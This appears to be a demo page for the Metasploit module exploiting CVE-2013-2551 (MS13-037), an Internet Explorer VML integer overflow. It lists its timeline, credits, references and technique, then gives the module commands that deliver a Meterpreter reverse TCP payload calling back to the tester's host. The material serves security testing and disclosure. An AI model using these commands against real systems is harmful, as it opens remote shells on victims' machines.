CVE-2013-2551 MS13-037 Internet Explorer Vulnerability Metasploit Demo

Timeline :

Vulnerability exploited during Pwn2Own 2013 by VUPEN the 2013-03-07
Vulnerability corrected by vendor the 2013-05-14
Details on the vulnerability provided by VUPEN the 2013-05-22
Metasploit PoC provided the 2013-06-12

PoC provided by :

Nicolas Joly
4B5F5F4B
juan vazquez

Reference(s) :

CVE-2013-2551
OSVDB-91197
MS13-037
BID-58570
VUPEN Advanced Exploitation of Internet Explorer 10 / Windows 8 Overflow (Pwn2Own 2013)

Affected version(s) :

Microsoft Internet Explorer 6 through 10

Tested on Windows 7 Integral with :

Internet Explorer 8
ntdll.dll

Description :

This module exploits an integer overflow vulnerability on Internet Explorer. The vulnerability exists in the handling of the dashstyle.array length for vml shapes on the vgx.dll module. This module has been tested successfully on Windows 7 SP1 with IE8. It uses the the JRE6 to bypass ASLR by default. In addition a target to use an info leak to disclose the ntdll.dll base address is provided. This target requires ntdll.dll v6.1.7601.17514 (the default dll version on a fresh Windows 7 SP1 installation) or ntdll.dll v6.1.7601.17725 (version installed after apply MS12-001).

Commands :

use exploit/windows/browser/ms13_037_svg_dashstyle
set SRVHOST 192.168.178.36
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.36
exploit

getuid
sysinfo